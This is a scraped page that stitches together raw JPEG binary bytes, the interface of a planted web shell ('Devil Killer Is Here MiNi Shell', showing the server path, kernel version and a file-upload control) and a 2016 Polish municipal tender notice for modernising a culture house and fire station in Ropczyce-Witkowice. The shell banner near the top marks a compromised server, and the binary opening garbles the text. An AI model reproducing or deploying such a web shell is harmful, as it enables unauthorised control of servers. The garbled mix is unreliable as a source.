JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160606/71585-N-2016.html

<p class="kh_header"><b>Ropczyce: Zadanie nr 1 - Modernizacja Domu Kultury w Witkowicach oraz zadanie nr 2 - Termomodernizacja budynku Domu Kultury i Ochotniczej Straży Pożarnej Ropczyce-Witkowice w ramach zadania pn.: Termomodernizacja budynków użyteczności publicznej na terenie gminy Ropczyce</b><br>
<b>Numer ogłoszenia: 71585 - 2016; data zamieszczenia: 06.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ropczyce , ul. Krisego 1/30, 39-100 Ropczyce, woj. podkarpackie, tel. (017) 2210550, faks (017) 2210555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ropczyce.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1 - Modernizacja Domu Kultury w Witkowicach oraz zadanie nr 2 - Termomodernizacja budynku Domu Kultury i Ochotniczej Straży Pożarnej Ropczyce-Witkowice w ramach zadania pn.: Termomodernizacja budynków użyteczności publicznej na terenie gminy Ropczyce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia dla zadania nr 1 pn. Modernizacja Domu Kultury w Witkowicach jest wykonanie na działkach o nr ew. 657/4  i 657/1 w Ropczycach - Witkowicach zgodnie z dokumentacją p.n. Projekt budowlany nadbudowy dachu i przebudowy budynku Domu Kultury w Ropczycach-Witkowicach opracowaną przez Zakład Obsługi Inwestycyjnej Sp. z.o.o. w Rzeszowie oddział Ropczyce oraz Firmę ELBUD, stanowiącą załącznik Nr 2 do SIWZ, specyfikacjami technicznymi wykonania i odbioru robót stanowiącymi załącznik Nr 3 do SIWZ oraz  przedmiarami robót stanowiącymi załącznik Nr 5 do SIWZ a także zgodnie z zasadami wiedzy technicznej n/w zakresu prac:
1.1. W ramach modernizacji budynku DK należy wykonać: 
- rozbiórkę istniejącego płaskiego dachu nad salą widowiskową: rozbiórkę dźwigarów stalowych, płytek korytkowych, ocieplenia z supremy oraz papy asfaltowej, rozbiórkę rynien, rur spustowych i obróbek blacharskich,
- rozbiórkę gzymsów wraz obróbką blacharską,
- demontaż pokrycia stropodachu na częścią piętrową, 
- wykucie otworu w stropie piętra,
- demontaż masztów antenowych,
- demontaż oraz ponowny montaż syreny strażackiej: poprzez wykonanie rdzenia żelbetowego i zamocowanie do niego syreny na kotwach,
- demontaż drabin stalowych i instalacji odgromowej,
- rozbiórkę czapek kominowych i schodów zewnętrznych,
- likwidacja zewnętrznego wyjścia na scenę,
- wykucia i rozbiórki ścian wewnętrznych budynku,
- rozbiórki pieców kaflowych,
- zasypanie piwnicy,
- obniżenie poziomu sceny,
- zerwanie istniejących okładzin posadzkowych i pogłębienie posadzki na poziomie parteru,
- zerwanie okładziny posadzkowej i warstw posadzkowych na poziomie piętra, 
- demontaż stolarki drzwiowej wraz z ościeżnicami,
- skucie wszystkich tynków wewnętrznych na ścianach i sufitach w budynku,
- demontaż instalacji elektrycznej,
- demontaż instalacji wod-kan,
- demontaż instalacji gazowej,
-  dach wielospadowy nad częścią piętrową w postaci wiązarów drewnianych deskowych w rozstawie ok. 1,0 m o kącie pochylenia połaci dachowej 20° i 30°, całość konstrukcji zabezpieczona przeciwgrzybowo i przeciwpożarowo np.: Fobosem M4 zgodnie z instrukcją producenta, z pokryciem blachą fałdową T35 mm w kolorze brązowym RAL 8014,
- dach nad salą widowiskową w postaci wiązarów drewnianych deskowych w rozstawie ok. 1,0 m o kącie pochylenia połaci dachowej 20°, całość konstrukcji zabezpieczona przeciwgrzybowo i przeciwpożarowo np.: Fobosem M4 zgodnie z instrukcją producenta, z pokryciem blacha fałdową T35 mm w kolorze brązowym RAL 8014,
- wieńce żelbetowe i podmurowań ścian zewnętrznych,
- kotwienia prętów zbrojeniowych (klamry) wieńca za pomocą żywicy epoksydowej,
- montaż wyłazu dachowego,
- montaż lukarn z PCV,
- nowe kominy oraz nadmurowania kominów,
- rdzeń żelbetowy przy kominie,
- nowe kanały wentylacyjne, obudowę kanałów wentylacyjnych cegłą pełną gr. 1/2 cegły,
- montaż kratek wentylacyjnych wewnętrznych,
- nowe czapy kominowe wraz z obróbką z blachy powlekanej,
- uzupełnienia stropu,
- montaż schodów strychowych ognioodpornych,
- warstwy posadzkowe na poziomie parteru (warstwa podsypkowa z piasku, warstwa chudego betonu B-10, izolacja przeciwwilgociowa papą termozgrzewalną x 2, izolacje cieplną styropianem posadzkowym EPS 100, wylewka cementowa zbrojona siatką stalową),
- posadzkę parkietową na sali widowiskowej z parkietu dębowego gr. 22 mm gat. I wraz z cyklinowaniem i lakierowaniem (o wymiarach 22×70×350 mm),
- podłogę sceny z deski sosnowej gr. 32 mm cyklinowanej i lakierowanej na legarach,
- okładziny posadzek z płytek gressowych wraz z cokolikiem (płytki gat. I, antypoślizgowe min. R10, klasa ścieralności V, kolorystyka posadzek w poszczególnych pomieszczeniach zróżnicowana kolorystycznie, min. dwa kolory w każdym, wzór płytki uzgadniany na etapie realizacji z użytkownikiem),
- okładziny schodów płytkami gressowymi ryflowanymi (parametry j.w.) wraz z cokolikiem,
- nowe schody monolityczne na zapleczu scenicznym wraz w wykończeniem płytkami gressowymi ryflowanymi (parametry j.w.) wraz z cokolikiem,
- boazerię z listew drewnianych lakierowanych na ruszcie drewnianym przy scenie,
- drewniane schody lakierowane na scenę,
- montaż deski odbojowej na ścianie, z płyty wiórowej laminowanej gr. 1,8 cm i szerokości 25 cm w kolorze drewnopodobnym, obustronnie oklejonej obrzeżem z PCV w sali widowiskowo-konferencyjnej,
- warstwy posadzkowe na poziomie piętra (izolacja przeciwwilgociowa z folii x 2, izolacje cieplną styropianem posadzkowym EPS 100, wylewka cementowa zbrojona siatką stalową),
- nowe ścianki działowe,
- zamurowanie otworów drzwiowych,
- montaż nadproży stalowych powlekanych siatką stalową, montaż nadproży ceramicznych prefabrykowanych,
- nowe tynki cem-wap. ścian i sufitów kat III,
- sufit podwieszany z płyty g-k x 2 wraz z konstrukcją na sali widowiskowej,
- gładzie z gipsu szpachlowego ścian i sufitów,
- malowanie ścian i sufitów farbami emulsyjnymi (kolorystyka ścian w poszczególnych pomieszczeniach zróżnicowana, ustalona zostanie na etapie realizacji),
- tynk mozaikowy wraz z przygotowaniem podłoża na ścianach w komunikacji i na klatce schodowej na wys. 1,50 m,
- licowanie ścian z płytek ceramicznych w sanitariatach i kuchni,
- montaż barierek na klatce schodowej ze stali nierdzewnej,
-  instalację kanalizacyjnej, instalację wody zimnej i p.poż.
- instalację gazowej do kotłowni i kuchni,
- przyłącza wody i przyłącza energetyczne,
- instalacje wentylacji mechanicznej,
- instalacje komputerową i teletechniczną, instalację antenową i głośnikową,
- demontaż istniejącego dojścia do budynku wraz z płytką spocznikową, wykonać nowe dojścia do budynku wraz z płytka spocznikową z kostki brukowej betonowej gr. 6 cm kolorowej,
- nowe schody zewnętrzne z kostki brukowej kolorowej gr. 6 cm oraz barierek ze stali nierdzewnej,
- rozbiórkę budynku gospodarczego,
- wywóz i utylizację materiału z rozbiórek.
1.2. Przedmiot zamówienia - zadania nr 1 nie obejmuje wykonania robót opisanych w opisie technicznym projektu p.n. Projekt budowlany nadbudowy dachu i przebudowy budynku Domu Kultury w Ropczycach-Witkowicach opracowanym przez Zakład Obsługi Inwestycyjnej Sp. z.o.o. w Rzeszowie oddział Ropczyce, jako: 
-  demontaż ogrodzenia oraz budowa nowego ogrodzenia, 
- budowy wiaty na grill oraz utwardzenia terenu za budynkiem DK (dojścia),
- wykonaniu kominów z cegły klinkierowej oraz przemurowań kominów z cegły klinkierowej,
a także zakresu robót związanych z termomodernizacją budynku.
2. Przedmiotem zamówienia dla zadania nr 2 pn. Termomodernizacja budynku Domu Kultury i Ochotniczej Straży Pożarnej Ropczyce-Witkowice jest wykonanie na działkach o nr ew. 657/4 i 657/1 w Ropczycach - Witkowicach zgodnie z dokumentacjami: p.n. Termomodernizacja budynków Domu Kultury i Ochotniczej Straży Pożarnej w Ropczycach-Witkowicach na działce nr ew. 657/1 i 657/4 opracowanym przez Pracownię Projektową Energoprojekt Tomasz Baran, p.n. Projekt budowlany instalacji centralnego ogrzewania w budynku Remizy Ochotniczej Straży Pożarnej w Ropczycach-Witkowicach opracowanym przez Pracownie Projektów i Analiz Technicznych Alicja Lis, Projekt wykonawczy - instalacja elektryczna opracowany przez Pracownię Projektów i Analiz Technicznych Alicja Lis, stanowiącymi załącznik Nr 2 do SIWZ, specyfikacjami technicznymi wykonania i odbioru robot stanowiącymi załącznik Nr 3 do SIWZ oraz  przedmiarami robót stanowiącymi załącznik Nr 5 do SIWZ a także zgodnie z zasadami wiedzy technicznej n/w zakresu prac:
2.1. W ramach termomodernizacji budynku należy wykonać: 
- wykucie z muru ościeżnic okiennych,
- wykucie z muru podokienników oraz demontaż parapetów zewnętrznych,
- demontaż opaski odbojowej,
- demontaż zadaszenia nad wejściami do budynków,
- odkopanie fundamentów budynków,
- ocieplenie ścian zewnętrznych DK warstwą styropianu o gr. 18 cm o wsp. lambda=0,040 W/m×K, metoda bezspoinową, wykończenie tynkiem mineralnym, baranek o gr. 1,5 mm, malowany farbą silikonową wraz z robotami przygotowawczymi,
- ocieplenie ścian zewnętrznych OSP warstwą styropianu o gr. 12 cm o wsp. lambda=0,040 W/m×K, metodą bezspionowa, wykończenie tynkiem mineralnym, baranek o gr. 1,5 mm, malowany farbą silikonową wraz z robotami przygotowawczymi,
- ocieplenie ścian zewnętrznych budynku warstwą wełny mineralnej (na połączeniu z budynkiem OSP) o współczynniku przewodzenia lambda =0,040 W/(m×K) metodą bezspoinową, wykończenie tynkiem mineralnym , baranek o gr. 1,5 mm, malowany farbą silikonową, wraz z robotami przygotowawczymi,
- ocieplenie stropodachu DK wełną mineralną o gr. 26 cm o wsp. lambda=0,042 W/m×K, wraz z paroizolacją,
- ocieplenie stropu pod nieogrzewanym poddaszem OSP wełną mineralną o gr. 20 o wsp. lambda=0,038 W/m×K,
- ocieplenie kominów warstwą styropianu o współczynniku przewodzenia lambda =0,038 W/(mxK), o grubości 5 cm, metodą bezspoinową, wykończenie tynkiem wraz z przygotowaniem podłoża,
- skucie szpalet i wykonanie warstwy styropianu gr. 3 cm, a na ścianach ocieplonych wełną mineralną szpalety ocieplić takim samym materiałem,
- wymianę okien na nowe: o wsp. U max. = 0,9 W/m2×K, okna szkolne szkłem bezpiecznym ( min. P1A), w tym okna ppoż. EI30,
- wymianę drzwi zewnętrznych na nowe: o wsp. U max. = 1,3 W/m2×K,
- wymianę bramy garażowej na nowe: o wsp. U max. = 1,3 W/m2×K,
- osuszenie i docieplenie ścian budynków poniżej poziomu terenu budynku warstwą styropianu ekstrudowanego o współczynniku przewodzenia lambda =0,035 W/(mxK) wraz z przygotowaniem podłoża i izolacją przeciwwilgociową,
- modernizację systemu grzewczego i systemu przygotowania ciepłej wody użytkowej (wykonanie instalacji centralnego ogrzewania i ciepłej wody użytkowej w pom. DK i OSP, montaż kotła gazowego kondensacyjnego, wykonanie instalacji gazowej kotłowni oraz technologii kotłowni),
-  modernizację oświetlenia w tym m.in. montaż nowych opraw energooszczędnych oraz montaż WLZ-ót, tablic rozdzielczych, gniazd wtykowych, instalacji odgromowej,
- przekucia w kominach i montaż kratek wentylacyjnych ze stali nierdzewnej,
- montaż rur spustowych z blachy powlekanej,
- montaż parapetów wewnętrznych z aglomarmuru oraz parapetów zewnętrznych z blachy powlekanej,
- nowe zadaszenie nad wejściem głównym,
- podbitkę dachu blacha trapezową T7 w kolorze pokrycia dachowego,
- nową opaskę odbojową przy budynku DK oraz odtworzyć opaskę odbojową przy budynku OSP.
2.2. Przedmiot zamówienia - zadania nr 2 obejmuje ponadto wykonanie robót w zakresie dotyczącym instalacji c.o., c.w.u. instalacji elektrycznej, technologii kotłowni gazowej w obrębie DK w oparciu o dokumentację p.n. Projekt budowlany nadbudowy dachu i przebudowy budynku Domu Kultury w Ropczycach-Witkowicach opracowanym przez Zakład Obsługi Inwestycyjnej Sp. z.o.o. w Rzeszowie oddział Ropczyce oraz Firmę ELBUD.
3. Ponadto w ramach zamówienia Wykonawca jest zobowiązany m.in. do:
- przeszkolenia użytkownika w zakresie dotyczącym użytkowania wykonanych w ramach zamówienia urządzeń i instalacji,
- urządzenia i zagospodarowania placu budowy oraz doprowadzenia niezbędnych mediów dla potrzeb budowy,
- zabezpieczenia i dozorowania budowy w czasie realizacji zamówienia,
- utrzymania czystości i porządku na terenie budowy,
- usuwania i unieszkodliwiania odpadów powstających w wyniku realizacji przedmiotu zamówienia na swój koszt,
- wykonania niezbędnych prób i odbiorów,
-  przygotowania niezbędnych dokumentów wymaganych do realizacji jak: oświadczenia kierownika budowy, kierowników robót, zaświadczenia o przynależności do Izby Inżynierów Budownictwa, plan bezpieczeństwa i ochrony zdrowia,
- przygotowania kompletu dokumentów do odbioru końcowego oraz do rozpoczęcia użytkowania budynków DK i OSP w Ropczycach - Witkowicach, w tym dokumentacji powykonawczej, inwentaryzacji geodezyjnej powykonawczej.
4. Szczegółowy zakres oraz sposób wykonania zamówienia określają w kolejności ważności opis przedmiotu zamówienia zawarty w SIWZ, dokumentacje budowlano - wykonawcze stanowiące załączniki Nr 2 do SIWZ, specyfikacje techniczne wykonania i odbioru robót budowlanych stanowiące załączniki Nr 3 do SIWZ oraz przedmiary robót stanowiące załącznik Nr 5 do SIWZ  mające charakter pomocniczy, a ilości podane w nich mają charakter orientacyjny.
5. Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi przepisami w tym m. in. przepisami BHP, PN przenoszącymi normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy, zasadami wiedzy technicznej, warunkami technicznymi wykonania i odbioru robót, należytą starannością, właściwą organizacją, bezpiecznie i dobrze jakościowo.
6 Użyte przy realizacji robót materiały winny spełniać wymagania określone w art. 10 Prawa budowlanego oraz winny posiadać dokumenty potwierdzające dopuszczenie do użytkowania                        i spełnienie odpowiednich norm.
7. Tam, gdzie w dokumentacji projektowej lub przedmiarach, zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów lub wskazano normy, o których mowa w art. 30 ust. 1 ustawy Pzp, Zamawiający dopuszcza do zastosowania przy realizacji zamówienia materiałów i rozwiązań równoważnych pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych, pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w niniejszej specyfikacji, po akceptacji przez Zamawiającego. Zamawiający dopuszcza jednocześnie wszelkie ich odpowiedniki rynkowe nie gorsze niż wskazane.
Wykonawca, który powołuje się na rozwiązania równoważne jest zobowiązany wykazać, że oferowane przez niego materiały, urządzenia i roboty budowlane spełniają określone przez Zamawiającego wymagania.
Parametry wskazanego przez Zamawiającego standardu przedstawiają warunki techniczne, eksploatacyjne, użytkowe, funkcjonalne i inne cechy istotne dla przedmiotu zamówienia, natomiast wskazana marka lub nazwa handlowa określa klasę produktu, a nie konkretnego producenta.
8. Zamawiający planuje że w ramach zadania nr 1 zostaną wykonane i zafakturowane w 2016 r. roboty do wartości 380 000,00 zł brutto, a pozostały zakres w 2017 r. Natomiast zadanie nr 2 planowane jest do wykonania w 2017 r.
9. Zamawiający informuje, że zadanie nr 2 planowane jest do dofinansowania ze środków UE w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014 - 2020, Działanie 3.2. Modernizacja energetyczna budynków.
10. Wymagany okres gwarancji min. 36 m-cy liczony od daty protokolarnego końcowego odbioru przedmiotu zamówienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.10.00-4, 45.45.00.00-6, 45.26.12.10-9, 45.30.00.00-0, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy przystępujący do przetargu są zobowiązani wnieść wadium w wysokości 30 000,00 zł, w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, w tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych lub w formie poręczeń udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt. 2 ustawy z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007r. Nr 42, poz. 275).
W przypadku wnoszenia wadium w pieniądzu należy dokonać wpłaty na konto Zamawiającego nr 39 9171 0004 0000 8136 2000 0050 w Banku Spółdzielczym w Ropczycach.
Wadium należy wnieść przed upływem terminu składania ofert. Przy czym wniesienie wadium w pieniądzu zamawiający uzna za skuteczne w chwili uznania rachunku zamawiającego.
Do oferty należy dołączyć dokument potwierdzający wniesienie wadium w oryginale lub w przypadku wnoszenia wadium w pieniądzu w formie kserokopii potwierdzonej za zgodność  z oryginałem przez uprawnionych przedstawicieli wykonawcy. 
Wadium winno być załącznikiem do oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca potwierdzi spełnianie tego warunku składając odpowiednie oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty oraz zgodnie ze sztuką budowlaną i prawidłowo ukończył co najmniej 2 zamówienia polegające na wykonaniu robót remontowych i wykończeniowych w budynku, w tym m.in. wykonaniu instalacji wod. - kan., gazowej, c.o., wentylacji mechanicznej i instalacji elektrycznej oraz wykonaniu docieplenia budynku o pow. min. 400 m2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca potwierdzi spełnianie tego warunku składając odpowiednie oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca udokumentuje, że dysponuje osobami, przewidzianymi do kierowania robotami budowlanymi, posiadającymi co najmniej 3 letnie doświadczenie w kierowaniu robotami budowlanymi oraz posiadające odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi w specjalności: konstrukcyjno - budowlanej, instalacji sanitarnych i elektrycznych lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca potwierdzi spełnianie tego warunku składając odpowiednie oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

